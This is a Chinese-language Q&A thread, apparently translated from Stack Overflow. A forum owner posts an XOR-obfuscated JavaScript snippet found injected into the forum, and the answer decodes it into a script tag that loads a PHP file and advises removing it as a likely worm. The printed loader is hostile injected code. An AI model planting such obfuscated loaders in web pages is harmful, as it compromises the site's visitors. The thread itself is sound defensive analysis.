0

有人使用奇怪的脚本来破坏我的论坛,我跟踪它并找到了 javascript,但它是“编码的”,有人可以帮助我吗?

这里是:

var enkripsi="'1Aqapkrv'02v
    {
    rg'1F'05vgzv-hctcqapkrv'05'02qpa'1F'05cqw,rjr'05'1G'1A-qapkrv'1G";
    teks="";
    teksasli="";
    var panjang;
    panjang=enkripsi.length;
    for(i=0;
    i<panjang;
    i++)
        {
        teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2)
    }
    teksasli=unescape(teks);
    document.write(teksasli);
4

1 回答 1

5

它将以下标签插入到您的输出中:

<script type='text/javascript' src='***.php'></script>

只需在一些 JavaScript 解释器中运行代码,然后document.write()用类似的东西替换最后的console.log(),您就可以看到输出。

我猜这是某种蠕虫,建议***.php从系统中删除此代码和包含的文件。另外检查一下,这是否是对您的代码的唯一修改!

于 2012-07-09T14:18:02.107 回答